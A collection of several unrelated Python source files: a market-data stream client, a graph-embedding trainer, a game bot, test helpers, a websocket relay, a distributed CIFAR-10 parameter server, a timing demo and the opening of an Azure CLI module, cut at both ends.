    #                                  on_close=my_custom_close_handler, on_error=my_custom_error_handler)
    my_client = polygon.StreamClient(key, polygon.enums.StreamCluster('crypto'), on_message=my_custom_process_message, on_close=my_custom_close_handler, on_error=my_custom_error_handler)
    try:
        my_client.start_stream_thread()
        # my_client.subscribe_stock_second_aggregates()
        my_client.subscribe_crypto_minute_aggregates()
        # my_client.subscribe_stock_trades()
    except Exception:
        traceback.print_exc()
        # best-effort cleanup of the subscription on any failure
        # my_client.unsubscribe_stock_second_aggregates()
        my_client.unsubscribe_crypto_minute_aggregates()
        # my_client.unsubscribe_stock_trades_aggregates()
    return None


def internet_check():
    """Probe the Polygon endpoint; return True when reachable within 15 s."""
    url = "https://socket.polygon.io"
    timeout = 15
    try:
        requests.get(url, timeout=timeout)
        connected = True
        print('Internet connected')
    except (requests.ConnectionError, requests.Timeout):
        connected = False
        print('No Internet')
    return connected


if __name__ == "__main__":
    connected = internet_check()
    if connected:
        try:
            r = connections()  # module-global Redis client used by redis_message()
            main()
        except Exception:
            traceback.print_exc()
            time.sleep(1)
            connected = internet_check()
            # wait for connectivity to come back before falling through
            while not connected:
                connected = internet_check()
                time.sleep(5)
    # keep polling until connectivity returns (best-effort reconnect loop)
    while not connected:
        connected = internet_check()
        time.sleep(5)
        continue
line.py
from pysmore.libs import graph, optimizer, embedding, util
import multiprocessing as mp

### global variables ###
# Shared, module-level configuration and state.  Worker processes created in
# train() read these globals -- this assumes the 'fork' start method so the
# children inherit the graph and embedding buffers (TODO confirm; under
# 'spawn' the workers would see unpopulated globals).
globalVariables = {
    'graph': None,
    'optimizer': optimizer.get_loglikelihood_loss,
    'updater': embedding.update_l2_embedding,
    'progress': util.print_progress,
    'init_alpha': 0.025,   # initial SGD learning rate
    'num_negative': 5      # negative samples drawn per positive pair
}
# Unsynchronized cross-process counter of completed updates; used only for
# progress reporting / learning-rate decay, so lost updates are tolerable.
current_update_times = mp.RawValue('i', 0)
vertexEmbed = None
contextEmbed = None
######

### user functions ###
def create_graph(train_path, embedding_dimension=64, delimiter='\t'):
    """Load the training edge list and allocate vertex/context embeddings.

    Returns (vertex embedding matrix, vertex-name-to-index mapper).
    """
    global globalVariables
    global vertexEmbed
    global contextEmbed
    globalVariables['graph'] = graph.Graph(train_path, delimiter=delimiter, mode='node', undirected=True)

    print('create embeddings...', end='', flush=True)
    # "unsafe" embeddings -- presumably process-shared storage without locks;
    # verify against pysmore's embedding module.
    vertexEmbed = embedding.create_embeddings_unsafe(
        amount=globalVariables['graph'].vertex_count,
        dimensions=embedding_dimension)
    contextEmbed = embedding.create_embeddings_unsafe(
        amount=globalVariables['graph'].context_count,
        dimensions=embedding_dimension)
    print('DONE', flush=True)
    return vertexEmbed, globalVariables['graph'].vertex_mapper


def set_param(params):
    """Override entries of the module-level configuration dictionary."""
    global globalVariables
    for key in params:
        globalVariables[key] = params[key]


def train(update_times=10, workers=1):
    """Run `update_times` million SGD updates split across `workers` processes."""
    global globalVariables
    globalVariables['total_update_times'] = int(update_times * 1000000)
    globalVariables['workers'] = workers
    globalVariables['worker_update_times'] = int((update_times * 1000000)/workers)
    # floor for the decayed learning rate
    globalVariables['min_alpha'] = globalVariables['init_alpha'] * 1000 / globalVariables['total_update_times']
    #util.optimize_numpy_multiprocessing(workers)
    processes = []
    for i in range(workers):
        globalVariables['graph'].initialize_random_state() # otherwise each process uses the same random seed
        p = mp.Process(target=learner, args=())
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
    # reset the shared counter so train() can be called again
    current_update_times.value = 0
    globalVariables['progress'](1.0)


def save_embeddings(file_prefix="line"):
    """Write the trained vertex embeddings to `<file_prefix>_all`."""
    global globalVariables
    global vertexEmbed
    global contextEmbed
    print()
    embedding.save_embeddings(vertexEmbed, globalVariables['graph'].vertices, file_prefix+'_all')
######


### main learner ###
def learner():
    """Worker-process loop: one LINE-style SGD pass of `worker_update_times` updates."""
    globalVariables['graph'].cache_vertex_samples(globalVariables['worker_update_times'])
    globalVariables['progress'](0.0)
    monitor_flag = int(1e3)  # updates between progress/learning-rate refreshes
    _learning_rate = globalVariables['init_alpha']
    for i in range(1, globalVariables['worker_update_times']+1):
        # positive example: a sampled vertex and one of its observed contexts
        vertex, vertex_idx = globalVariables['graph'].draw_a_vertex_from_sample()
        context, context_pos_idx = globalVariables['graph'].draw_a_context(vertex)

        vertex_embedding = vertexEmbed[vertex_idx]
        context_pos_embedding = contextEmbed[context_pos_idx]
        vertex_loss, context_pos_loss = \
            globalVariables['optimizer'](vertex_embedding, context_pos_embedding, 1.0)
        globalVariables['updater'](contextEmbed, context_pos_idx, context_pos_loss, _learning_rate)

        # negative examples: contexts drawn uniformly, pushed toward label 0;
        # their gradients w.r.t. the vertex are accumulated into vertex_loss
        context_neg, context_neg_idxs = \
            globalVariables['graph'].draw_contexts_uniformly(amount=globalVariables['num_negative'])
        for context_neg_idx in context_neg_idxs:
            context_neg_embedding = contextEmbed[context_neg_idx]
            vertex_neg_loss, context_neg_loss = \
                globalVariables['optimizer'](vertex_embedding, context_neg_embedding, 0.0)
            globalVariables['updater'](contextEmbed, context_neg_idx, context_neg_loss, _learning_rate)
            vertex_loss += vertex_neg_loss
        globalVariables['updater'](vertexEmbed, vertex_idx, vertex_loss, _learning_rate)

        if i % monitor_flag == 0:
            # linear learning-rate decay based on global (all-worker) progress
            current_progress_percentage = current_update_times.value / globalVariables['total_update_times']
            _learning_rate = globalVariables['init_alpha'] * (1.0 - current_progress_percentage)
            _learning_rate = max(globalVariables['min_alpha'], _learning_rate)
            # NOTE(review): read-modify-write on a RawValue without a lock --
            # updates can be lost between workers; tolerated for progress only.
            current_update_times.value += monitor_flag
            globalVariables['progress'](current_progress_percentage)
######
runbot.py
#!/usr/bin/python import logging import argparse import threading from server import ServerMessageTypes, ServerComms from statemachine import StateMachine import time # Parse command line args parser = argparse.ArgumentParser() parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output') parser.add_argument('-H', '--hostname', default='127.0.0.1', help='Hostname to connect to') parser.add_argument('-p', '--port', default=8052, type=int, help='Port to connect to') parser.add_argument('-n', '--name', default='TimScorer', help='Name of bot') args = parser.parse_args() # Set up console logging if args.debug: logging.basicConfig( format='[%(asctime)s] %(message)s', level=logging.DEBUG) else: logging.basicConfig(format='[%(asctime)s] %(message)s', level=logging.INFO) # Connect to game server GameServer = ServerComms(args.hostname, args.port) # Spawn our tank logging.info("Creating tank with name '{}'".format(args.name)) GameServer.sendMessage(ServerMessageTypes.CREATETANK, {'Name': args.name}) state_machine = StateMachine(GameServer=GameServer, name=args.name) lock = threading.Lock() def recieve_messages(): while True: message = GameServer.readMessage() lock.acquire() state_machine.update(message) lock.release() def run_state_machine(): while True: lock.acquire() state_machine.choose_state() state_machine.perform_current_state() lock.release() time.sleep(0.2) message_thread = threading.Thread(target=recieve_messages) message_thread.start() state_machine_thread = threading.Thread(target=run_state_machine) state_machine_thread.start()
utilities.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Shared helpers for the mockintosh test suite: mock-server process
management, static HTTP fixtures, TCP reachability checks and stdout/stderr
suppression context managers."""

import sys
import socket
import time
import signal
import io
import uuid
import logging
import http.server
import socketserver
from os import path, chdir
from unittest.mock import patch
from multiprocessing import Process
import contextlib

from mockintosh.constants import PROGRAM
from mockintosh import initiate

__location__ = path.abspath(path.dirname(__file__))


class DefinitionMockForAsync:
    """Bare-bones stand-in for mockintosh's definition object, carrying only
    the attributes the async tests read."""

    def __init__(self, source_dir, template_engine, rendering_queue):
        self.source_dir = source_dir
        self.template_engine = template_engine
        self.rendering_queue = rendering_queue
        self.data = {}
        self.logs = None
        self.stats = None


class SimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):

    def do_GET(self):  # noqa: N802
        http.server.SimpleHTTPRequestHandler.do_GET(self)

    def do_POST(self):  # noqa: N802
        # POST is deliberately served like GET so fixtures can POST to static files.
        http.server.SimpleHTTPRequestHandler.do_GET(self)


def signal_handler(sig, frame):
    """No-op handler; installed so a delivered SIGALRM cannot kill the process."""
    pass


def tcping(host, port=65533, timeout=2):
    """Attempt a TCP connect to ``(host, port)``.

    Returns a ``(reachable, latency_ms)`` tuple; latency is measured even for
    failed attempts (time until the error surfaced).
    """
    s = socket.socket()
    s.settimeout(timeout)
    result = False
    end = None
    try:
        start = time.time()
        s.connect((host, port))
        s.close()
        result = True
        end = time.time()
    except Exception:
        logging.warning('Pinging to %s:%s is failed!', host, port)
        end = time.time()
    ms = 1000 * (end - start)
    return result, round(ms, 2)


def run_mock_server(*args, wait=10):
    """Start mockintosh in a child process with the given CLI arguments.

    Then waits up to ``wait`` seconds via ``sigtimedwait`` on SIGALRM (which is
    never actually sent -- effectively an interruptible sleep) so the server
    has time to come up.

    :rtype: Process
    """
    mock_server_process = None
    testargs = [PROGRAM, *args]
    with patch.object(sys, 'argv', testargs):
        mock_server_process = Process(target=initiate, args=())
        mock_server_process.start()
    signal.signal(signal.SIGALRM, signal_handler)
    signal.sigtimedwait([signal.SIGALRM], wait)
    return mock_server_process


def get_config_path(config):
    """Resolve a config file name relative to this test directory."""
    return path.join(__location__, config)


@contextlib.contextmanager
def nostdout():
    """Suppress the standard output (use it with ``with`` statements).

    Fixed: restoration now happens in ``finally`` so an exception raised
    inside the block no longer leaves ``sys.stdout`` pointing at the buffer.
    """
    save_stdout = sys.stdout
    sys.stdout = io.StringIO()
    try:
        yield
    finally:
        sys.stdout = save_stdout


@contextlib.contextmanager
def nostderr():
    """Suppress the standard error (use it with ``with`` statements).

    Fixed: restoration moved into ``finally`` (see ``nostdout``).
    """
    save_stderr = sys.stderr
    sys.stderr = io.StringIO()
    try:
        yield
    finally:
        sys.stderr = save_stderr


def is_valid_uuid(val, version=4):
    """Return True if ``val`` parses as a UUID of the given version."""
    try:
        uuid.UUID(str(val), version=version)
        return True
    except ValueError:
        return False


def is_ascii(s):
    """Return True if every character of ``s`` is 7-bit ASCII."""
    return all(ord(c) < 128 for c in s)


def _start_simple_http_server_on_path(_path: str, port: int):
    """Child-process entry point: serve ``_path`` forever on ``port``."""
    web_dir = path.join(path.dirname(__file__), _path)
    chdir(web_dir)
    httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def start_simple_http_server_on_path(_path: str, port: int):
    """Serve a static directory on ``port`` from a background process."""
    simple_http_server_process = Process(target=_start_simple_http_server_on_path,
                                         args=(_path, port))
    simple_http_server_process.start()
    return simple_http_server_process
relay.py
'''
    Copyright (c) 2016-2017 Wind River Systems, Inc.

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at:

    http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
'''

"""
This module contains the Relay class which is a secure way to pipe data to a
local socket connection. This is useful for Telnet which is not secure by
default.
"""

import logging
import random
import select
import socket
import ssl
import threading

# yocto supports websockets, not websocket, so check for that
try:
    import websocket
except ImportError:
    import websockets as websocket

# Sentinel string the cloud side sends to request opening the local socket.
CONNECT_MSG = "CONNECTED-129812"


class Relay(object):
    """
    Class for establishing a secure pipe between a cloud based websocket and
    a local socket. This is useful for things like Telnet which are not secure
    to use remotely.
    """

    def __init__(self, wsock_host, sock_host, sock_port, secure=True, log=None):
        """
        Initialize a relay object for piping data between a websocket and a
        local socket
        """
        self.wsock_host = wsock_host   # cloud websocket URL
        self.sock_host = sock_host     # local TCP endpoint host
        self.sock_port = sock_port     # local TCP endpoint port
        self.secure = secure           # verify TLS certs when True
        self.log = log                 # optional external log(level, fmt, *args) callable
        # random suffix keeps log names unique across concurrent relays
        self.log_name = "Relay:{}:{}({:0>5})".format(self.sock_host, self.sock_port, random.randint(0,99999))

        if self.log is None:
            # no logger supplied: build a default stream logger for this relay
            self.logger = logging.getLogger(self.log_name)
            log_handler = logging.StreamHandler()
            #log_formatter = logging.Formatter(constants.LOG_FORMAT, datefmt=constants.LOG_TIME_FORMAT)
            #log_handler.setFormatter(log_formatter)
            self.logger.addHandler(log_handler)
            self.logger.setLevel(logging.DEBUG)
            self.log = self.logger.log

        self.running = False   # loop flag; cleared to shut the relay down
        self.thread = None     # thread running _loop()
        self.lsock = None      # local TCP socket (opened lazily on CONNECT_MSG)
        self.wsock = None      # cloud websocket

    def _loop(self):
        """
        Main loop that pipes all data from one socket to the next. The
        websocket connection is established first so this is also where the
        local socket connection will be started when a specific string is
        received from the Cloud
        """
        while self.running is True:
            # Continuously receive data from each socket and send it through
            # the other
            socket_list = [self.wsock]
            if self.lsock:
                socket_list.append(self.lsock)
            # 1s timeout so the loop re-checks self.running even when idle
            read_sockets, _ws, _es = select.select(socket_list, [], [], 1)
            for sock in read_sockets:
                if sock == self.wsock:
                    try:
                        op, data_in = sock.recv_data()
                    except websocket.WebSocketConnectionClosedException:
                        self.running = False
                        break
                    if data_in:
                        if self.lsock:
                            # local connection already up: forward verbatim
                            self.lsock.send(data_in)
                        elif data_in == CONNECT_MSG:
                            # If the local socket has not been established yet,
                            # and we have received the connection string, start
                            # local socket.
                            try:
                                self.lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                                self.lsock.connect((self.sock_host, self.sock_port))
                            except socket.error:
                                self.running = False
                                self.log(logging.ERROR, "%s - Failed to open local socket", self.log_name)
                                break
                            self.log(logging.INFO, "%s - Local socket successfully opened", self.log_name)
                        # NOTE(review): non-CONNECT_MSG data arriving before the
                        # local socket exists is silently dropped -- confirm intended.
                    else:
                        self.log(logging.INFO, "%s - Received NULL from websocket, Stopping", self.log_name)
                        self.running = False
                        break
                elif self.lsock and sock == self.lsock:
                    data_in = sock.recv(4096)
                    if data_in:
                        # forward local traffic up to the cloud as binary frames
                        self.wsock.send_binary(data_in)
                    else:
                        self.log(logging.INFO, "%s - Received NULL from socket, Stopping", self.log_name)
                        self.running = False
                        break

        # loop exited: tear down both ends
        if self.lsock:
            self.lsock.close()
            self.lsock = None
        self.wsock.close()
        self.wsock = None
        self.log(logging.INFO, "%s - Sockets Closed", self.log_name)

    def start(self):
        """
        Establish the websocket connection and start the main loop
        """
        if not self.running:
            self.running = True

            sslopt = {}
            if not self.secure:
                # caller opted out of certificate verification
                sslopt["cert_reqs"] = ssl.CERT_NONE

            # Connect websocket to Cloud
            self.wsock = websocket.WebSocket(sslopt=sslopt)
            try:
                self.wsock.connect(self.wsock_host)
            except ssl.SSLError as error:
                self.running = False
                self.wsock.close()
                self.wsock = None
                self.log(logging.ERROR, "%s - Failed to open Websocket", self.log_name)
                raise error
            self.log(logging.INFO, "%s - Websocket Opened", self.log_name)
            self.thread = threading.Thread(target=self._loop)
            self.thread.start()
        else:
            raise RuntimeError("{} - Already running!".format(self.log_name))

    def stop(self):
        """
        Stop piping data between the two connections and stop the loop thread
        """
        self.log(logging.INFO, "%s - Stopping", self.log_name)
        self.running = False
        if self.thread:
            self.thread.join()
            self.thread = None


# module-level registry of running relays (managed by the helpers below)
relays = []


def create_relay(url, host, port, secure=True, log_func=None):
    """Create, start and register a new Relay."""
    global relays
    newrelay = Relay(url, host, port, secure=secure, log=log_func)
    newrelay.start()
    relays.append(newrelay)


def stop_relays():
    """Stop every registered relay, shutting them down in parallel threads."""
    global relays
    threads = []
    while relays:
        relay = relays.pop()
        thread = threading.Thread(target=relay.stop)
        thread.start()
        threads.append(thread)
    for thread in threads:
        thread.join()
multi_ps_async_part2.py
"""Asynchronous parameter-server half of a distributed CIFAR-10 trainer.

Listens for worker connections over TCP, ships them the current variable
values, applies gradients they send back, and logs throughput.
Python 2 code (cPickle, xrange); sockets exchange pickled payloads framed
by an 8-byte pickled-length header.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np
import sys
import cPickle as pickle
import socket
from multiprocessing import Process, Queue, Value, Manager
from ctypes import c_char_p
from datetime import datetime
import time
import tensorflow as tf

import cifar10

# Parameter server listens on localhost; workers connect to port, port+1, ...
TCP_IP = '127.0.0.1'
s = 0             # module-level listening socket, set in main()
MAX_WORKERS = 0   # number of worker processes, set from argv in main()

FLAGS = tf.app.flags.FLAGS

tf.app.flags.DEFINE_string('train_dir', '/home/ubuntu/cifar10_train',
                           """Directory where to write event logs """
                           """and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 100002,
                            """Number of batches to run.""")
tf.app.flags.DEFINE_boolean('log_device_placement', False,
                            """Whether to log device placement.""")
tf.app.flags.DEFINE_integer('log_frequency', 100,
                            """How often to log results to the console.""")

gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.25)


def safe_recv(size, server_socket):
    """Receive exactly `size` bytes from `server_socket` and return them.

    Loops until the full payload has arrived.
    NOTE(review): the bare except only prints "Error" and keeps looping; if
    the peer closes the connection (recv returns ''), this loop never
    terminates — verify against the worker-side sender.
    """
    data = ''
    temp = ''
    recv_size = 0
    while 1:
        try:
            temp = server_socket.recv(size-len(data))
            data += temp
            recv_size = len(data)
            if recv_size >= size:
                break
        except:
            print("Error")
    return data


def handleWorker(port, gradients_q, global_var_vals):
    """Per-worker server loop (runs in its own Process).

    Accepts one worker connection on `port`, then forever: receives a
    pickled gradient list (8-byte pickled-length header followed by the
    payload), enqueues it on `gradients_q` for the trainer, and replies
    with the latest pickled variable values from `global_var_vals`.
    NOTE(review): the `while 1` never breaks, so the trailing close()
    calls are unreachable; the process is expected to be killed (daemon).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("Connecting to port : ", port)
    s.bind((TCP_IP, port))
    s.listen(1)
    conn, addr = s.accept()
    print('Connection address:', addr)
    while 1:
        # NOTE(review): assumes the pickled length header is exactly 8
        # bytes — confirm this matches the worker's framing.
        size = safe_recv(8, conn)
        size = pickle.loads(size)
        data = safe_recv(size, conn)
        #print("Received size: ", size)
        local_worker_gradients = pickle.loads(data)
        gradients_q.put(local_worker_gradients)
        # Reply with the freshest global variable snapshot.
        size = len(global_var_vals.value)
        size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL)
        conn.sendall(size)
        conn.sendall(global_var_vals.value)
    conn.close()
    s.close()


def train():
    """Train CIFAR-10 for a number of steps.

    Builds the apply-gradients half of the graph, sends initial variable
    values to every worker, then repeatedly pops worker gradients off the
    queue, applies them, and republishes the updated variables.
    """
    g1 = tf.Graph()
    with g1.as_default():
        # Build a Graph that trains the model with one batch of examples and
        # updates the model parameters.
        #global_step = tf.contrib.framework.get_or_create_global_step()
        global_step = tf.Variable(-1, name='global_step', trainable=False, dtype=tf.int32)
        increment_global_step_op = tf.assign(global_step, global_step+1)

        cifar10.build_graph_part2()

        # One placeholder per trainable variable; workers' gradients are fed
        # through these into the apply-gradients op.
        placeholder_gradients = []
        #with tf.device("/gpu:0"):
        for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
            placeholder_gradients.append((tf.placeholder('float', shape=var.get_shape()), var))
        # Zero-filled feed for runs that only read (e.g. fetching variables).
        feed_dict = {}
        i = 0
        for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
            feed_dict[placeholder_gradients[i][0]] = np.zeros(placeholder_gradients[i][0].shape)
            i = i+1
        train_op = cifar10.train_part2(global_step, placeholder_gradients)

        class _LoggerHook(tf.train.SessionRunHook):
            """Logs loss and runtime."""

            def begin(self):
                self._step = -1
                self._start_time = time.time()

            def before_run(self, run_context):
                self._step += 1

            def after_run(self, run_context, run_values):
                if self._step % FLAGS.log_frequency == 0:
                    current_time = time.time()
                    duration = current_time - self._start_time
                    self._start_time = current_time

                    examples_per_sec = FLAGS.log_frequency * FLAGS.batch_size / duration
                    sec_per_batch = float(duration / FLAGS.log_frequency)

                    format_str = ('%s: step %d,(%.1f examples/sec; %.3f '
                                  'sec/batch)')
                    print (format_str % (datetime.now(), self._step,
                                         examples_per_sec, sec_per_batch))

        with tf.train.MonitoredTrainingSession(
                checkpoint_dir=FLAGS.train_dir,
                hooks=[tf.train.StopAtStepHook(last_step=FLAGS.max_steps),
                       _LoggerHook()],
                config=tf.ConfigProto(
                    log_device_placement=FLAGS.log_device_placement,
                    gpu_options=gpu_options)) as mon_sess:
            for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
                print(v)
            # Sending the initial value of variables
            var_val = []
            for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
                var_val.append(mon_sess.run(v, feed_dict=feed_dict))
            send_data = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL)
            global global_var_vals
            global_var_vals.value = send_data
            size = len(send_data)
            size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL)
            # Each worker connects once to the main port for the bootstrap
            # snapshot, then talks to its dedicated handleWorker port.
            for i in xrange(MAX_WORKERS):
                conn, addr = s.accept()
                conn.sendall(size)
                conn.sendall(send_data)
                conn.close()
            print("Sent initial var values to workers")
            while not mon_sess.should_stop():
                val = mon_sess.run(global_step, feed_dict=feed_dict)
                #print("Iteration: ", val)
                if(val == (FLAGS.max_steps - 1)):
                    print("Global step val while stoping.")
                    sys.exit()
                # Blocks until some worker pushes a gradient list.
                recv_grads = gradients_q.get()
                #print("received gradients from worker")
                feed_dict = {}
                for i, grad_var in enumerate(recv_grads):
                    feed_dict[placeholder_gradients[i][0]] = recv_grads[i]
                res = mon_sess.run(train_op, feed_dict=feed_dict)
                var_val = []
                #print("Run complete with new values")
                for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
                    var_val.append(mon_sess.run(v, feed_dict=feed_dict))
                # NOTE(review): `global global_var_vals` already declared
                # above in this function; the repeat is redundant but legal.
                global global_var_vals
                global_var_vals.value = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL)
                #print("New values of variables sent ")


def main(argv=None):  # pylint: disable=unused-argument
    """Entry point: parse argv, spawn per-worker handler processes, train.

    Usage: <script> <port> <no of workers>.  Worker i is served on
    port + i + 1; the base port only hands out the bootstrap snapshot.
    """
    if(len(sys.argv) != 3):
        print("<port> <no of workers> required")
        sys.exit()
    global s
    global port
    global MAX_WORKERS
    port = int(sys.argv[1])
    MAX_WORKERS = int(sys.argv[2])
    global gradients_q
    global global_var_vals
    gradients_q = Queue()
    manager = Manager()
    # Shared string cell holding the latest pickled variable values.
    global_var_vals = manager.Value(c_char_p, "")
    for i in xrange(MAX_WORKERS):
        process_port = port + i + 1
        p = Process(target=handleWorker, args=(process_port, gradients_q, global_var_vals))
        p.daemon = True
        p.start()
    cifar10.maybe_download_and_extract()
    if tf.gfile.Exists(FLAGS.train_dir):
        tf.gfile.DeleteRecursively(FLAGS.train_dir)
    tf.gfile.MakeDirs(FLAGS.train_dir)
    total_start_time = time.time()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("Connecting to port : ", port, " and no of workers: ", MAX_WORKERS)
    s.bind((TCP_IP, port))
    s.listen(1)
    train()
    print("--- %s seconds ---" % (time.time() - total_start_time))


if __name__ == '__main__':
    tf.app.run()
example_1.py
"""Demo comparing sequential execution of CPU-bound and I/O-bound work.

(The threaded/multiprocessing variants were removed from the commented-out
versions; only the sequential baseline runs here.)
"""
import time
from multiprocessing import Process
from threading import Thread

import requests


def calculate() -> None:
    """Pure CPU busy-work: repeat a Fibonacci-style recurrence many times."""
    for _ in range(50):
        previous_value, pre_previous_value = 0, 1
        current_value = None
        for _ in range(50_000):
            current_value = previous_value + pre_previous_value
            previous_value, pre_previous_value = current_value, previous_value


def load_person_data(person_id: int) -> None:
    """Fetch one Star Wars character record; the response is discarded."""
    swapi_people_url = "https://swapi.dev/api/people/"
    person_url = f"{swapi_people_url}{person_id}"
    requests.get(url=person_url)


def do_work() -> None:
    """One unit of mixed work: CPU burn, then nine sequential HTTP fetches."""
    calculate()
    for person_id in range(1, 10):
        load_person_data(person_id)


def run_example() -> None:
    """Time two sequential do_work() runs and report elapsed seconds."""
    start_time = time.perf_counter()

    for _ in range(2):
        do_work()

    end_time = time.perf_counter()
    print(f"Time: {end_time - start_time:.2f}")


if __name__ == "__main__":
    run_example()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import binascii import datetime import errno import json import os import os.path import platform import random import re import shutil import ssl import stat import string import subprocess import sys import tempfile import threading import time import uuid import webbrowser from distutils.version import StrictVersion from math import isnan from six.moves.urllib.request import urlopen # pylint: disable=import-error from six.moves.urllib.error import URLError # pylint: disable=import-error # pylint: disable=import-error import yaml import dateutil.parser from dateutil.relativedelta import relativedelta from knack.log import get_logger from knack.util import CLIError from knack.prompting import prompt_pass, NoTTYException, prompt_y_n from msrestazure.azure_exceptions import CloudError import requests # pylint: disable=no-name-in-module,import-error from azure.cli.command_modules.acs import acs_client, proxy from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod from azure.cli.core.api import get_config_dir from azure.cli.core.azclierror import (ResourceNotFoundError, ArgumentUsageError, ClientRequestError, InvalidArgumentValueError, ValidationError) from azure.cli.core._profile import Profile from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id from azure.cli.core.keys import is_valid_ssh_rsa_public_key from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait from azure.cli.core.commands import LongRunningOperation from azure.graphrbac.models import 
(ApplicationCreateParameters, ApplicationUpdateParameters, PasswordCredential, KeyCredential, ServicePrincipalCreateParameters, GetObjectsParameters, ResourceAccess, RequiredResourceAccess) from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceNetworkProfile from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceLinuxProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterServicePrincipalProfile from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshConfiguration from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshPublicKey from azure.mgmt.containerservice.v2020_09_01.models import ManagedCluster from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAADProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAddonProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAgentPoolProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentity from azure.mgmt.containerservice.v2020_09_01.models import AgentPool from azure.mgmt.containerservice.v2020_09_01.models import AgentPoolUpgradeSettings from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterSKU from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterWindowsProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentityUserAssignedIdentitiesValue from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider from 
azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile from ._client_factory import cf_container_services from ._client_factory import cf_resource_groups from ._client_factory import get_auth_management_client from ._client_factory import get_graph_rbac_management_client from ._client_factory import cf_resources from ._client_factory import get_resource_by_name from ._client_factory import cf_container_registry_service from ._client_factory import cf_managed_clusters from ._client_factory import get_msi_client from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type, _parse_comma_separated_list) from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided, update_load_balancer_profile, create_load_balancer_profile) from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME from ._consts import CONST_MONITORING_ADDON_NAME from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME from ._consts import CONST_AZURE_POLICY_ADDON_NAME from ._consts import CONST_INGRESS_APPGW_ADDON_NAME from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID from ._consts import 
CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE

logger = get_logger(__name__)


# pylint:disable=too-many-lines,unused-argument
def which(binary):
    """Return the full path to `binary` found on PATH, or None.

    On Windows the '.exe' suffix is appended and ';' is used as the PATH
    separator; elsewhere ':' is used.
    """
    path_var = os.getenv('PATH')
    if platform.system() == 'Windows':
        binary = binary + '.exe'
        parts = path_var.split(';')
    else:
        parts = path_var.split(':')

    for part in parts:
        bin_path = os.path.join(part, binary)
        if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path

    return None


def wait_then_open(url):
    """
